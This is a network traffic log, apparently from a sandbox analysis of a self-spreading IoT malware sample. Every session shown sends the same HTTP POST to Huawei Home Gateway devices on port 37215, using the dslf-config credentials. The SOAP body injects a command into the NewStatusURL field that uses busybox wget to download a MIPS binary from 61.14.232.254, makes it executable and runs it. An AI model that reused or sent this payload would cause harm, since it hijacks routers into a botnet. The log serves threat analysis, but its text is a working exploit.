                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  802192.168.2.1338544157.51.106.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418153048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  803192.168.2.134206041.21.238.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418302059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  804192.168.2.1356468119.50.59.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418323040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  805192.168.2.1356014197.87.157.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418340921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  806192.168.2.135581689.65.52.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418421030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  807192.168.2.1358062197.191.77.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418554068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  808192.168.2.1341226197.143.111.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418571949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  809192.168.2.134322841.139.207.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418591022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  810192.168.2.1354740157.176.67.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418818951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  811192.168.2.1342102200.188.197.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.418838024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 